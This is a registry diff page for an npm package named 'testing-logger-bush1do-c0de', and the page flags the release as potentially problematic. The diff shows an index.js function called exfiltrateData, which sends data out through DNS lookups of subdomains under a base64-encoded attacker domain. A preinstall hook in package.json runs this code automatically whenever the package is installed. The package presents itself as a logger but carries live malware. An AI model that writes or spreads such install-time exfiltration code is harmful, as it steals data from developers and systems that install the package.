testing-logger-bush1do-c0de 101.0.0 → 102.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of testing-logger-bush1do-c0de might be problematic. Click here for more details.

Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -2,7 +2,7 @@ const dns = require('dns');
2
2
  const { exec } = require('child_process');
3
3
 
4
4
  function exfiltrateData(data) {
5
- const subdomain = `${data}.${Buffer.from('noreply.access.ly').toString('base64')}`;
5
+ const subdomain = `${data}.${Buffer.from('noreplyy.access.ly').toString('base64')}`;
6
6
  dns.resolve4(subdomain, (err, addresses) => {
7
7
  if (err) console.error(err);
8
8
  else console.log(`Data exfiltrated: ${addresses}`);
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "testing-logger-bush1do-c0de",
3
- "version": "101.0.0",
3
+ "version": "102.0.0",
4
4
  "main": "index.js",
5
5
  "scripts": {
6
6
  "preinstall": "node index.js"